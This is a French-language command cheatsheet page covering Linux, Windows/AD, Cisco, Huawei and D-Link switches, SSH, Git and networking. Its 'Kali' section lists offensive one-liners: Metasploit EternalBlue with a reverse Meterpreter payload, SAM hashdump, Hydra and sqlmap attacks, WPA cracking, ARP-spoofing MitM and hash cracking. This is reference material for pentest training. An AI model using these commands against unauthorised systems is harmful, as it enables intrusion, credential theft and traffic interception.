Cheatsheets
Référentiel unifié de commandes — recherche en temps réel par type et mot-clé.
Recherche de commandes(640 / 640)
LinuxFichiers & Répertoires
ls -laLister fichiers avec permissionspwdAfficher répertoire courantcd /pathChanger de répertoiremkdir -p dir/subdirCréer répertoires imbriquésrm -rf dirSupprimer récursivement (force)cp -r src/ dst/Copier récursivementmv file newDéplacer ou renommercat fileAfficher contenu d'un fichierless filePaginer le contenu d'un fichierhead -n 20 fileAfficher les 20 premières lignestail -f /var/log/syslogSuivre un fichier de log en temps réelfind / -name "*.conf" 2>/dev/nullChercher fichiers par nomfind /home -user usernameTrouver fichiers d'un utilisateurfind / -perm /4000 2>/dev/nullFichiers avec bit SUIDgrep -r "pattern" /etc/Recherche récursive de patterngrep -i "error" /var/log/syslogRecherche insensible à la cassegrep -v "^#" /etc/ssh/sshd_configExclure les lignes commentéesgrep -E "192\.168\.[0-9]+\.[0-9]+" log.txtRecherche avec expression régulière étenduetar -czf archive.tar.gz /dossier/Créer archive gziptar -xzf archive.tar.gzExtraire archive gziptar -tzf archive.tar.gzLister le contenu d'une archiveawk -F: '{print $1, $6}' /etc/passwdExtraire colonnes (login et home)sed -i 's/Port 22/Port 2222/' /etc/ssh/sshd_configSubstitution inline dans un fichiersed -n '10,20p' fichier.txtAfficher lignes 10 à 20LinuxPermissions & Utilisateurs
chmod 755 script.shPermissions rwxr-xr-x (octal)chmod 644 fichier.txtPermissions rw-r--r-- (octal)chmod 600 .ssh/id_rsaPermissions clé privée SSHchmod u+x fichierAjouter execute au propriétairechmod a+x script.shExecute pour tous les utilisateurschown user:group fichierChanger propriétaire et groupechown -R www-data:www-data /var/www/Changer propriétaire récursivementuseradd -m -s /bin/bash -G sudo usernameCréer utilisateur avec home et sudopasswd usernameChanger mot de passe utilisateurusermod -aG docker usernameAjouter utilisateur à un groupeusermod -L usernameVerrouiller le compte utilisateurchage -E 2025-12-31 usernameDéfinir date d'expiration du compteid usernameAfficher UID/GID de l'utilisateurgroups usernameLister les groupes d'un utilisateurLinuxSystème & Services
systemctl start nginxDémarrer un servicesystemctl stop nginxArrêter un servicesystemctl restart nginxRedémarrer un servicesystemctl reload nginxRecharger la config sans interruptionsystemctl enable nginxActiver au démarrage automatiquesystemctl status nginxVoir l'état d'un servicejournalctl -u nginx -fSuivre les logs d'un service en temps réeljournalctl -u nginx --since "1 hour ago"Logs depuis la dernière heurejournalctl -p errAfficher uniquement les erreursapt update && apt upgrade -yMettre à jour les paquets (Debian)apt install paquetInstaller un paquetapt remove paquetSupprimer un paquetapt purge paquetSupprimer paquet et ses configsapt autoremoveSupprimer les dépendances orphelinesdpkg -l | grep paquetLister les paquets installésdpkg -i paquet.debInstaller un .deb localps auxLister tous les processusps aux | grep nginxFiltrer processus par nomtopMoniteur processus interactifhtopMoniteur processus améliorékill PIDEnvoyer signal SIGTERM à un processuskill -9 PIDForcer l'arrêt d'un processus (SIGKILL)pkill nginxTuer processus par nomnice -n 10 commandeLancer commande avec priorité bassecrontab -eÉditer les tâches planifiées croncrontab -lLister les tâches cronLinuxRéseau Linux
ip -br aAfficher interfaces et IP (format court)ip -br lAfficher état des interfaces (format court)uptimeDurée de fonctionnement du systèmeip addr showAfficher les interfaces réseauip link set eth0 upActiver une interface réseauip addr add 192.168.1.10/24 dev eth0Assigner une IP à une interfaceip route showAfficher la table de routageip route add default via 192.168.1.1Ajouter une route par défautss -tulnPorts TCP/UDP en écoutess -tulnpPorts en écoute avec processus associésping -c 4 8.8.8.8Test de connectivité ICMPtraceroute 8.8.8.8Tracer la route vers un hôtecurl -I https://example.comAfficher les en-têtes HTTPwget -q -O /dev/null https://example.comTester une URL en silencenslookup example.comRésolution DNS simpledig example.comRésolution DNS détailléedig +short example.com ARésolution DNS courte (enregistrement A)ssh -i ~/.ssh/id_ed25519 user@serveurConnexion SSH avec clé privéessh -p 2222 user@serveurConnexion SSH sur port non-standardssh-keygen -t ed25519 -C "email@example.com"Générer une paire de clés SSHssh-copy-id user@serveurCopier clé publique vers serveurssh -L 8080:localhost:80 user@serveurTunnel SSH local (port forwarding)ssh -R 8080:localhost:80 user@serveurTunnel SSH distant (reverse port forwarding)scp file user@host:/pathCopier un fichier via SSHarping <ip>Résolution ARP (fonctionne même si ICMP bloqué)arp -s <IP> <MAC>Fixer une entrée ARP statiquearp -d <IP>Supprimer une entrée ARP statiquearp | grep <mac>Chercher correspondance MAC → IPip addr add 192.168.10.1/24 dev eth0Ajouter IP temporaire sur interfaceip addr del 192.168.10.1/24 dev eth0Supprimer IP temporaireip link show eth0Détail interface (MAC, état, MTU)ifconfig eth1.211IP d'une sous-interface VLANmii-tool -r eth0Relancer auto-négociation (fix mismatch vitesse)lldpcli show neighborsVoisinage LLDP localhistoryHistorique des commandesLinuxScreen (console série)
ls /dev/*USB*Trouver le port USB branchéscreen /dev/ttyUSB0 9600Ouvrir console série (vitesse 9600)screen -lsLister les sessions screen activesscreen -r <PID>Se rattacher à une session screenkill <PID>Tuer une session screenLinuxFirewall Linux
ufw enableActiver le pare-feu UFWufw status verboseVoir l'état et les règles UFWufw allow 22/tcpAutoriser SSHufw allow 80/tcpAutoriser HTTPufw allow from 192.168.1.0/24Autoriser tout le sous-réseau LANufw deny 23/tcpBloquer Telnetufw delete allow 80/tcpSupprimer une règle UFWiptables -L -v -nLister les règles iptablesiptables -A INPUT -p tcp --dport 80 -j ACCEPTAutoriser trafic entrant HTTPiptables -A INPUT -j DROPBloquer tout trafic non explicitement autoriséiptables-save > /etc/iptables/rules.v4Sauvegarder règles iptablesPowerShellActive Directory
Import-Module ActiveDirectoryImporter le module Active DirectoryGet-ADUser -Filter * | Select-Object Name, SamAccountName, EnabledLister tous les utilisateurs ADGet-ADUser -Identity "username" -Properties *Voir toutes les propriétés d'un utilisateurNew-ADUser -Name "John Doe" -SamAccountName "jdoe" -Enabled $trueCréer un utilisateur ADSet-ADUser -Identity "jdoe" -Title "Administrateur" -Department "IT"Modifier les propriétés d'un utilisateurDisable-ADAccount -Identity "jdoe"Désactiver un compte ADRemove-ADUser -Identity "jdoe"Supprimer un utilisateur ADGet-ADGroup -Filter *Lister tous les groupes ADNew-ADGroup -Name "GRP_IT" -GroupScope Global -GroupCategory SecurityCréer un groupe de sécurité ADAdd-ADGroupMember -Identity "GRP_IT" -Members "jdoe"Ajouter un utilisateur à un groupe ADGet-ADGroupMember -Identity "GRP_IT"Lister les membres d'un groupe ADNew-ADOrganizationalUnit -Name "IT" -Path "DC=domain,DC=local"Créer une OU (unité organisationnelle)Get-ADOrganizationalUnit -Filter *Lister toutes les OUsPowerShellGPO
Get-GPO -AllLister toutes les GPOGet-GPOReport -Name "Default Domain Policy" -ReportType HTML -Path "C:\GPO_Report.html"Exporter un rapport GPO en HTMLNew-GPO -Name "Politique_Securite_IT"Créer une nouvelle GPONew-GPLink -Name "Politique_Securite_IT" -Target "OU=IT,DC=domain,DC=local"Lier une GPO à une OUgpupdate /forceForcer l'application immédiate des GPOgpresult /RRésultat des GPO appliquéesgpresult /H rapport.htmlRapport GPO en HTMLPowerShellDNS & DHCP Windows
Get-DnsServerZoneLister les zones DNSAdd-DnsServerPrimaryZone -Name "example.com" -ZoneFile "example.com.dns"Créer une zone DNS primaireAdd-DnsServerResourceRecordA -Name "www" -ZoneName "example.com" -IPv4Address "192.168.1.10"Ajouter un enregistrement AResolve-DnsName "server01.domain.local"Résoudre un nom DNSipconfig /flushdnsVider le cache DNS localGet-DhcpServerv4ScopeLister les scopes DHCPAdd-DhcpServerv4Scope -Name "LAN" -StartRange 192.168.1.100 -EndRange 192.168.1.200 -SubnetMask 255.255.255.0Créer un scope DHCPGet-DhcpServerv4Lease -ScopeId 192.168.1.0Voir les baux DHCP actifsPowerShellSystème Windows
Get-Service | Where-Object Status -eq "Running"Services en cours d'exécutionStart-Service -Name "wuauserv"Démarrer un service WindowsStop-Service -Name "wuauserv"Arrêter un service WindowsRestart-Service -Name "spooler"Redémarrer un service WindowsSet-Service -Name "wuauserv" -StartupType AutomaticConfigurer le type de démarrageGet-Process | Sort-Object CPU -Descending | Select-Object -First 5Top 5 processus par CPUGet-EventLog -LogName System -Newest 5050 derniers événements systèmeGet-WmiObject Win32_OperatingSystemInformations sur l'OSSet-ExecutionPolicy RemoteSignedAutoriser scripts PowerShell signésGet-ChildItem -Recurse -Filter "*.log"Chercher fichiers log récursivementGet-Process | Export-Csv -Path "processes.csv" -NoTypeInformationExporter processus en CSVsysteminfoInformations système complètes (CMD)tasklistLister les processus (CMD)PowerShellRéseau Windows
Get-SmbShareLister les partages réseauNew-SmbShare -Name "Partage_IT" -Path "D:\Partages\IT" -FullAccess "GRP_IT"Créer un partage réseauSet-SmbShare -Name "Partage_IT" -Description "Partage du service IT"Modifier un partage réseauipconfig /allInformations réseau complètesnetstat -anConnexions réseau actives et portsTest-NetConnection host -Port 80Tester la connectivité TCPInvoke-Command -ComputerName "PC" -ScriptBlock {Get-Service}Exécution distante PowerShellnet user username /domainInfos utilisateur dans le domaine (CMD)net group "Domain Admins" /domainMembres du groupe Domain Admins (CMD)PowerShellHyper-V
Get-VMLister les machines virtuelles Hyper-VNew-VM -Name "Server01" -MemoryStartupBytes 2GB -Generation 2Créer une nouvelle VMStart-VM -Name "Server01"Démarrer une VMStop-VM -Name "Server01"Arrêter une VMCheckpoint-VM -Name "Server01" -SnapshotName "Avant mise à jour"Créer un snapshot de VMSwitchCiscoNavigation & Affichage
enablePasser en mode privilégié (EXEC)configure terminalEntrer en mode configuration globaleendRetourner au mode privilégié depuis configwrite memorySauvegarder la configuration courantecopy running-config startup-configCopier config active vers startupshow versionVersion IOS et informations hardwareshow running-configAfficher la configuration activeshow ip interface briefRésumé de toutes les interfaces IPshow ip routeAfficher la table de routage IPshow interfacesStatistiques détaillées des interfacesshow vlan briefRésumé des VLANs configurésshow ip ospf neighborVoisins OSPF détectésshow ip ospf databaseBase de données OSPF (LSDB)show access-listsAfficher toutes les ACLsSwitchCiscoConfiguration Interface
interface GigabitEthernet0/0Entrer en configuration d'interfaceip address 192.168.1.1 255.255.255.0Configurer l'adresse IP d'une interfaceno shutdownActiver l'interface (lever administrativement)description "LAN Interface"Ajouter une description à l'interfacehostname Router1Définir le nom du routeur/switchbanner motd # Message du jour #Message d'avertissement à la connexionSwitchCiscoVLANs
vlan 10Créer ou accéder au VLAN 10name VLAN_COMPTANommer un VLANswitchport mode accessConfigurer un port en mode accèsswitchport access vlan 10Assigner un port à un VLANswitchport mode trunkConfigurer un port en mode trunkswitchport trunk allowed vlan 10,20,30Autoriser VLANs spécifiques sur trunkSwitchCiscoRoutage
ip route 192.168.2.0 255.255.255.0 192.168.1.254Route statique vers un réseauip route 0.0.0.0 0.0.0.0 10.0.0.1Route par défaut (passerelle)router ospf 1Activer le processus OSPFnetwork 192.168.1.0 0.0.0.255 area 0Annoncer un réseau en OSPF area 0ip route 192.168.2.0 255.255.255.0 192.168.1.254Route statiqueip route 0.0.0.0 0.0.0.0 10.0.0.1Route par défautrouter ospf 1Activer OSPFnetwork 192.168.1.0 0.0.0.255 area 0Annoncer réseau en OSPFSwitchCiscoNAT & DHCP
access-list 1 permit 192.168.0.0 0.0.255.255ACL standard pour NATip nat inside source list 1 interface Gi0/0 overloadNAT Overload (PAT) vers l'interface WANip nat inside source static 192.168.1.10 203.0.113.5NAT statique (IP privée → IP publique)ip nat insideMarquer interface comme côté LAN (NAT)ip nat outsideMarquer interface comme côté WAN (NAT)ip dhcp pool LAN_POOLCréer un pool DHCPnetwork 192.168.1.0 255.255.255.0Réseau du pool DHCPdefault-router 192.168.1.1Passerelle par défaut DHCPdns-server 8.8.8.8 1.1.1.1Serveurs DNS pour le pool DHCPip dhcp excluded-address 192.168.1.1 192.168.1.20Exclure des adresses du pool DHCPip nat inside source list 1 interface Gi0/0 overloadNAT Overload (PAT)ip nat inside source static 192.168.1.10 203.0.113.5NAT statiqueip dhcp pool LAN_POOLCréer un pool DHCPip dhcp excluded-address 192.168.1.1 192.168.1.20Exclure des adressesSwitchCiscoSécurité & ACLs
access-list 10 permit 192.168.1.0 0.0.0.255ACL standard — autoriser sous-réseauaccess-list 10 deny anyACL standard — tout bloqueraccess-list 100 permit tcp 192.168.1.0 0.0.0.255 any eq 80ACL étendue — autoriser HTTPaccess-list 100 permit tcp 192.168.1.0 0.0.0.255 any eq 443ACL étendue — autoriser HTTPSaccess-list 100 deny ip any anyACL étendue — bloquer tout le resteip access-group 100 inAppliquer l'ACL en entrée sur une interfaceaccess-list 1 permit 192.168.0.0 0.0.255.255ACL standard pour NATaccess-list 100 permit tcp 192.168.1.0 0.0.0.255 any eq 80ACL étendue — autoriser HTTPaccess-list 100 deny ip any anyACL étendue — bloquer toutip access-group 100 inAppliquer ACL en entréeSSHConnexion
ssh user@hostConnexion standardssh user@host -p 2222Connexion sur un port spécifiquessh -l user hostConnexion avec -l (login)ssh -l root hostConnexion root avec flag -lssh -A user@hostForward agent SSH (pour rebondir ensuite)SSHProxyJumpRebond
ssh -J user@bastion user@cibleRebond via un bastionssh -J user@bastion:2222 user@cibleRebond avec port spécifiquescp -J user@bastion fichier.txt user@cible:/tmp/Copie de fichier via bastionSSHTunnels
ssh -D 9999 user@hostTunnel SOCKS dynamique (proxy navigateur)ssh -N -L 8080:cible:80 user@bastionPort forwarding localSSHClés
ssh-keygen -t ed25519Générer une paire de clés (recommandé)ssh-keygen -t rsa -b 4096Générer clé RSA 4096 bitsssh-copy-id user@hostCopier sa clé publique sur un serveurssh-addCharger la clé par défaut dans l'agentssh-add -lLister les clés chargées dans l'agentssh-add -DVider l'agent SSHSSHDépannage
ssh-keygen -R hostSupprimer ancienne clé d'un hôtessh -vv user@hostMode debug verbosessh -o StrictHostKeyChecking=no user@hostAccepter la clé sans confirmationSSHConfig (~/.ssh/config)
Host mon-serveur\n User admin\n Port 2222\n Hostname server.example.comRaccourci dans ~/.ssh/configGitInitialisation
git initInitialiser un dépôt Git localgit clone urlCloner un dépôt distantgit clone url --depth 1Cloner avec historique minimal (shallow)GitSuivi
git statusVoir l'état des fichiers dans le dépôtgit add .Indexer tous les changementsgit add -pIndexer interactivement par hunksgit commit -m "message"Créer un commitgit commit --amendModifier le dernier commitgit diffVoir les changements non indexésgit diff --stagedVoir les changements indexésgit log --oneline --graphHistorique compact avec graphe de branchesgit show HEADDétails du dernier commitGitRemote
git remote -vLister les dépôts distantsgit remote add origin urlAjouter un dépôt distantgit push origin mainPousser vers la branche maingit push -u origin featurePousser et définir le remote de suivigit pullRécupérer et fusionner depuis le remotegit fetch originRécupérer sans fusionnerGitBranches
git branch -aLister toutes les branches (locales et distantes)git checkout -b featureCréer et basculer sur une nouvelle branchegit switch mainBasculer sur la branche maingit merge featureFusionner une branche dans la branche activegit rebase mainRebaser la branche sur maingit branch -d featureSupprimer une branche localeGitAvancé
git stashMettre de côté les changements en coursgit stash popRestaurer les changements mis de côtégit reset --hard HEAD~1Annuler le dernier commit (destructif)git revert HEADAnnuler le dernier commit (non-destructif)git tag v1.0.0Créer un tag de versiongit cherry-pick abc1234Appliquer un commit spécifiquegit bisect startDémarrer la recherche binaire de régressionRéseauDiagnostic
ping hostTester la connectivité ICMPtraceroute hostTracer la route vers un hôtetracepath hostTracer la route avec MTU (sans root)mtr hostTraceroute interactif en temps réelnetstat -tulnpPorts en écoute avec processus associésarp -aAfficher la table ARP localearp -nTable ARP sans résolution DNSRéseauDNS
dig domainRésolution DNS complètedig @8.8.8.8 domainRésolution DNS via serveur spécifiquedig -x 8.8.8.8Résolution DNS inverse (PTR)nslookup domainRésolution DNS simplehost domainRésolution DNS en ligne de commandewhois domain.comInformations WHOIS d'un domaineRéseauAnalyse
nmap -sV hostScanner les ports et détecter les versionsnmap -sn 192.168.1.0/24Découverte d'hôtes (ping scan)tcpdump -i eth0 port 80Capturer le trafic HTTP sur eth0tcpdump -i eth0 -w capture.pcapEnregistrer une capture réseautcpdump -r capture.pcapLire une capture réseau sauvegardéewiresharkAnalyser le trafic réseau graphiquementRéseauHTTP
curl -I urlAfficher les en-têtes HTTP d'une URLcurl -X POST -d "data" urlRequête HTTP POST avec donnéescurl -u user:pass urlRequête HTTP avec authentificationcurl -k https://urlIgnorer les erreurs de certificat SSLwget urlTélécharger un fichierwget -r -np urlTélécharger récursivement un siteRéseauDiagnostic Windows
ipconfigConfiguration IP de toutes les interfacesipconfig /allConfig IP détaillée (MAC, DHCP, DNS, bail)ipconfig /releaseLibérer le bail DHCPipconfig /renewRenouveler le bail DHCPipconfig /flushdnsVider le cache DNS localipconfig /displaydnsAfficher le cache DNS localipconfig /registerdnsRéenregistrer les noms DNSnbtstat -a <host>Résolution NetBIOS d'un hôte distantnbtstat -nNoms NetBIOS enregistrés localementnetsh interface show interfaceÉtat de toutes les interfacesnetsh interface ip show configConfiguration IP détailléenetsh wlan show profilesProfils WiFi enregistrésnetsh wlan show profile name="SSID" key=clearVoir le mot de passe WiFinetsh advfirewall show allprofilesÉtat du pare-feu Windowsnetsh interface ip set dns "Ethernet" static 8.8.8.8Changer le DNSroute printTable de routage Windowspathping hostCombinaison ping + traceroute avec statsTest-NetConnection host -Port 443Test de connectivité TCP (PowerShell)RéseauDiagnostic Linux
ip addr showAfficher toutes les interfaces et IPip -br aInterfaces et IP (format court)ip -br lÉtat des interfaces (format court)ip route showTable de routageip route add 10.0.0.0/24 via 192.168.1.1Ajouter une route statiqueip route del 10.0.0.0/24Supprimer une routeip neigh showTable ARP (remplace arp -a)ss -tulnpPorts en écoute avec processus (remplace netstat)resolvectl statusVérifier la configuration DNS (systemd)systemd-resolve --flush-cachesVider le cache DNS (systemd)nmcli device statusÉtat des interfaces (NetworkManager)nmcli connection showConnexions configuréesethtool eth0Infos physiques d'une interface (vitesse, duplex)iwconfig wlan0Informations interface WiFiRéseauCache & Reset
sudo systemd-resolve --flush-cachesVider cache DNS Linux (systemd)sudo resolvectl flush-cachesVider cache DNS Linux (alternatif)sudo dscacheutil -flushcacheVider cache DNS macOSsudo killall -HUP mDNSResponderVider cache DNS macOS (alternatif)ipconfig /flushdnsVider cache DNS Windowssudo ip addr flush dev eth0Vider la config IP d'une interfacesudo dhclient -r eth0Libérer le bail DHCP Linuxsudo dhclient eth0Renouveler le bail DHCP Linuxnetsh winsock resetRéinitialiser le stack TCP/IP Windowsnetsh int ip resetReset complet de la config IP WindowsRéseauTransfert de fichiers
scp fichier user@host:/cheminCopier un fichier via SSHscp -r dossier user@host:/cheminCopier un dossier récursivementscp user@host:/chemin/fichier .Télécharger un fichier distantrsync -avz dossier user@host:/cheminSynchroniser avec compressionrsync -avz --delete source/ dest/Synchroniser en supprimant les obsolètesnc -zv host 80Test rapide de port (netcat)nc -l 4444Écouter sur un port (netcat)RéseauSNMP
snmpwalk -v2c -c public hostInterroger un agent SNMP v2csnmpget -v2c -c public host OIDRécupérer une valeur SNMPsnmpwalk -v3 -u user -l authPriv -a SHA -A pass -x AES -X key hostSNMP v3 chiffréRéseauFirewall Linux
iptables -L -nLister les règles de filtrageiptables -t nat -L -nLister les règles NATiptables -A INPUT -p tcp --dport 22 -j ACCEPTAutoriser SSHiptables -A INPUT -j DROPBloquer tout le resteiptables-save > /etc/iptables/rules.v4Sauvegarder les règlesiptables-restore < /etc/iptables/rules.v4Restaurer les règlesnft list rulesetLister les règles nftablesufw statusÉtat du pare-feu UFWufw allow 22/tcpAutoriser SSH via UFWufw enableActiver UFWiptables-save | grep <port>Vérifier une règle NAT/redirectionipset list <nom>Lister les entrées d'un ipsetRéseauARP & Bande passante
arping <ip>Résolution ARP directe (détecte conflits IP)iperf3 -c <host> -P4 -p5201Test de bande passante uploadiperf3 -c <host> -P4 -p5201 -RTest de bande passante downloadping -c 500 -f <ip>Flood ping (500 paquets, test lien rapide)RéseauGrep & Logs
grep -A 5 "pattern" fileAfficher 5 lignes après le matchgrep -B 5 "pattern" fileAfficher 5 lignes avant le matchgrep -C 5 "pattern" fileContexte 5 lignes avant + aprèsgrep -a "pattern" fileForcer traitement texte (fichiers binaires)journalctl -u service | grep "pattern"Chercher dans les logs d'un servicejournalctl -fu serviceSuivre les logs en temps réel (follow)Réseautcpdump
tcpdump -i eth0 -nCapture temps réel sans résolution DNStcpdump -i eth0 -nvvCapture verbosetcpdump -i eth0 -w capture.pcapEnregistrer dans un fichiertcpdump -C 1000 -i eth0 -w cap.pcapLimiter à 1000 paquetstcpdump -i eth0 host 10.0.0.1 -nvvFiltrer par IPtcpdump -i eth0 ether host AA:BB:CC:DD:EE:FF -nvvFiltrer par MACtcpdump -i eth0 port 22 -nvvFiltrer par porttcpdump -i eth0 port 67 or port 68 -nvvCapturer trafic DHCPtcpdump -r capture.pcapRelire une capture sauvegardéeKaliReconnaissance
nmap -sC -sV -oN scan.txt targetScan complet avec scripts NSE et sauvegardenmap -sS targetScan SYN furtif (stealth scan)nmap -p- targetScanner les 65535 portsnmap -O targetDétecter le système d'exploitationnmap -A targetScan agressif (OS, version, scripts, traceroute)nmap --script vuln targetScanner les vulnérabilités connues (NSE)nmap -sS -sV target -oX scan.xmlExport XML pour import Metasploitnmap -sS -sV target -oA scan_completExport dans tous les formats simultanémentgobuster dir -u http://target -w list.txtÉnumération de répertoires webgobuster dns -d target.com -w subdomains.txtÉnumération de sous-domaines DNSsearchsploit keywordRechercher des exploits dans la base localetheHarvester -d domain.com -b allCollecte OSINT : emails, sous-domainesnikto -h http://targetAudit de vulnérabilités d'un serveur webenum4linux -a targetÉnumération SMB/NetBIOS (Windows/Samba)KaliMetasploit
msfconsoleLancer le framework Metasploitsearch ms17-010Rechercher un module par mot-clé ou CVEuse exploit/windows/smb/ms17_010_eternalblueSélectionner un module exploitshow optionsAfficher les paramètres du module actifshow payloadsLister les payloads compatiblesset RHOSTS 10.10.10.1Définir l'adresse de la ciblesetg LHOST 10.10.14.1Définir l'IP d'attaquant globalementset payload windows/x64/meterpreter/reverse_tcpSélectionner un payload MeterpreterexploitLancer l'attaqueexploit -zLancer et mettre la session en arrière-plansessionsLister les sessions activessessions -i 2Interagir avec la session n°2db_nmap -sS -sV 10.10.10.1Scan Nmap depuis msfconsole (résultats en DB)workspace -a TryHackMeCréer un espace de travail isoléhostsLister les machines scannées en baseservicesLister les services découverts en basesaveSauvegarder les variables globales MetasploitKaliMeterpreter
getuidVérifier les privilèges obtenuspsLister les processus sur la ciblemigrate PIDMigrer la session vers un autre processushashdumpExtraire les hashs SAM (mots de passe)run post/windows/gather/smart_hashdumpExtraire et sauvegarder les hashs SAMsearch -f flag*.txtChercher un fichier sur la ciblebackgroundMettre la session en arrière-plan (Ctrl+Z)KaliExploitation
hydra -l user -P wordlist.txt ssh://targetBrute force SSH avec Hydrahydra -L users.txt -P pass.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"Brute force formulaire web HTTPsqlmap -u "http://target?id=1" --dbsDétecter injections SQL et lister BDssqlmap -u "http://target?id=1" -D dbname -T users --dumpExtraire une table via injection SQLKaliWi-Fi
airmon-ng check killTuer les processus interférant avec le Wi-Fiairmon-ng start wlan0Passer la carte Wi-Fi en mode monitorairodump-ng wlan0monScanner tous les réseaux Wi-Fi à portéeairodump-ng --bssid <MAC> --channel <CH> -w capture wlan0monCibler un réseau et capturer le handshake WPAaircrack-ng -b <MAC> -w rockyou.txt capture.capAttaque dictionnaire sur handshake WPAKaliMitM & Réseau
macof -i eth0Saturer la table MAC du switch (flood)ettercap -GLancer Ettercap en mode graphiqueettercap -T -q -i eth0 -M arp:remote /VICTIME// /ROUTEUR//ARP spoofing Man-in-the-Middletcpdump -i eth0 -w interception.pcapCapturer trafic intercepté vers fichier .pcapKaliPost-exploitation
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCracker des hashs avec John the Ripperjohn --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCracker hashs NTLM (Windows)hashcat -m 0 hash.txt wordlist.txtCracker hashs MD5 avec GPUhashcat -m 1000 hash.txt wordlist.txtCracker hashs NTLM avec GPUsudo gunzip /usr/share/wordlists/rockyou.txt.gzDécompresser le dictionnaire rockyouSwitchCiscoNavigation
enablePasser en mode privilégié (EXEC)conf terminalEntrer en mode configurationexitSortir du mode courantendRetourner au mode privilégiéno <cmd>Annuler une commandeSwitchCiscoMonitoring
show running-configConfiguration en coursshow interfaces statusÉtat de tous les portsshow interfaces status gi0/0/1Détail d'un portshow mac address-tableTable MAC complèteshow mac address-table address <mac>Chercher une adresse MACshow mac address-table interface gi28MAC sur un port spécifiqueshow ip interface briefIP des interfacesshow versionVersion firmwareshow lldp neighborsVoisinage LLDPshow ip routeTable de routageshow vlan briefListe des VLANsshow arpTable ARPshow clockHeure du switchshow loggingLogs du switchshow logging | include gi3Logs filtrés par portshow interfaces configVoir si un port est coupéshow <cmd> | include <regex>Filtrer la sortie d'une commandeshow interfaces descriptionDescription + état Up/Down de tous les portsshow interfaces countersCompteurs émission/réception par portshow running-config interface gi11Config d'un port spécifiqueshow inventoryInventaire matériel (châssis, modules, SFP)show power inlineÉtat PoE global (budget, puissance, statut)show power inline gi11Détail PoE d'un portshow lldp neighbors gi11Voisinage LLDP d'un seul portshow startup-configConfiguration sauvegardée (NVRAM)SwitchCiscoVLAN
vlan 10Créer le VLAN 10vlan database 10Créer VLAN (syntaxe Catalyst)name SERVEURSNommer le VLAN courantno vlan 10Supprimer un VLANswitchport mode accessPort en mode accèsswitchport access vlan 10Assigner port au VLAN 10no switchport access vlanRetirer le VLAN accessswitchport mode trunkPort en mode trunkswitchport trunk allowed vlan add 10,209Ajouter VLANs Taggedswitchport trunk allowed vlan remove 209Retirer un VLAN Taggedswitchport trunk allowed vlan noneRetirer tous les VLANsswitchport trunk native vlan 10VLAN natif (Untagged)no switchport trunk native vlanRetirer le native VLANSwitchCiscoInterfaces
interface range gi1,gi3-5Sélectionner plusieurs interfacesshutdownDésactiver un portno shutdownRéactiver un portSwitchCiscoIP
interface vlan 1 → ip address 10.x.x.x 255.255.255.0IP fixe sur VLAN de managementinterface vlan 209 → ip address dhcpIP DHCP sur VLANSwitchCiscoPoE
power inline autoActiver PoEpower inline neverCouper PoE (reboot équipement)power inline limit-mode portLimiter le budget PoE par portSwitchCiscoDiagnostic
test cable-diagnostics tdr interface gi0/14Lancer test câble TDRshow cable-diagnostics tdr interface gi0/14Résultat test câbleshow cable-diagnostics cable-length interface gi9Longueur de câbleshow fiber-ports optical-transceiver int gi27Diagnostic fibre SFPSwitchCiscoSystème
write memSauvegarder la configurationcopy running-config startup-configSauvegarder (= write mem)reloadRedémarrerreload in 10Reboot planifié dans 10 minutesreload cancelAnnuler le reboot planifiéSwitchCiscoSauvegarde
show startup-configAfficher la configuration sauvegardéecopy running-config tftp:Exporter la config vers un serveur TFTPSwitchCiscoTrunk & EtherChannel
show interfaces trunkAfficher les ports trunk et VLANs autoriséschannel-group 1 mode activeCréer un EtherChannel LACPshow etherchannel summaryÉtat des EtherChannelsSwitchCiscoSTP
show spanning-treeÉtat du Spanning Treespanning-tree portfastActiver PortFast (transition immédiate)spanning-tree bpduguard enableActiver BPDU Guard (protection boucle)SwitchCiscoSécurité port
show port-securityÉtat de la sécurité des portsswitchport port-securityActiver la sécurité sur le portswitchport port-security maximum 2Limiter à 2 MAC sur le portswitchport port-security violation shutdownDésactiver le port en cas de violationswitchport port-security mac-address stickyApprendre dynamiquement les MAC autoriséesSwitchHuaweiNavigation
system-viewEntrer en mode configurationquitSortir du mode courantundo <cmd>Annuler une commande (= "no" Cisco)SwitchHuaweiMonitoring
display current-configurationConfig en coursdisplay interface briefÉtat des portsdisplay interface GigabitEthernet 0/0/1Détail d'un portdisplay mac-addressTable MACdisplay ip interface briefIP des interfacesdisplay versionVersion firmwaredisplay lldp neighbor briefVoisinage LLDPdisplay ip routing-tableTable de routagedisplay vlanListe des VLANsdisplay arpTable ARPdisplay clockHeuredisplay <cmd> | include <regex>Filtrer la sortieSwitchHuaweiVLAN
vlan batch 10 209 to 212Créer plusieurs VLANsport link-type trunkPort en mode trunkport trunk allow-pass vlan 10 209 to 212VLANs autorisés (Tagged)port trunk pvid vlan 10VLAN natif trunk (Untagged)undo trunk allow-pass vlan allRetirer tous les VLANsport default vlan 40Mode accessundo port default vlanRetirer le VLAN accessSwitchHuaweiInterfaces
interface range gi0/0/1 gi0/0/3 to gi0/0/5Range interfacesshutdown / undo shutdownDésactiver / réactiver un portclear configuration thisReset complet d'une interfaceSwitchHuaweiIP
interface VlanIf 1 → ip address 10.x.x.x maskIP fixe sur VLANinterface VlanIf 209 → ip address dhcp-allocIP DHCP sur VLANSwitchHuaweiPoE
poe power 15400Limiter le budget PoE (mW)SwitchHuaweiSystème
sysname NOMChanger le hostnamesaveSauvegarder la configurationrebootRedémarrerschedule reboot delay <minutes>Reboot planifiéreset factory-configurationReset usineSwitchD-LinkConnexion
telnet <ip_switch>Connexion (défaut: 10.90.90.90 admin/admin)SwitchD-LinkMonitoring
show config effectiveConfiguration complèteshow switchInfos switch (IP, MAC)show vlanVLANs configurésshow portsÉtat de tous les portsshow ports 2Détail d'un portshow fdbTable MAC complèteshow fdb ports 23-24MAC sur des ports spécifiquesshow lldp remote_portsVoisinage LLDPshow error ports 1:1Erreurs sur un portshow poe portsÉtat PoEshow port_vlan 3-5PVID des portsshow running-config globalConfig en cours (vue globale)SwitchD-LinkVLAN
create vlan admin tag 101Créer VLAN 101 nommé "admin"delete vlan vlanid 101Supprimer un VLANconfig vlan vlanid 101 add tagged 4-5Ajouter ports Taggedconfig vlan vlanid 101 add untagged 3Ajouter port Untaggedconfig vlan vlanid 101 delete 3-5Retirer ports du VLANconfig port_vlan 4-5 pvid 101Changer le PVIDSwitchD-LinkPoE & Ports
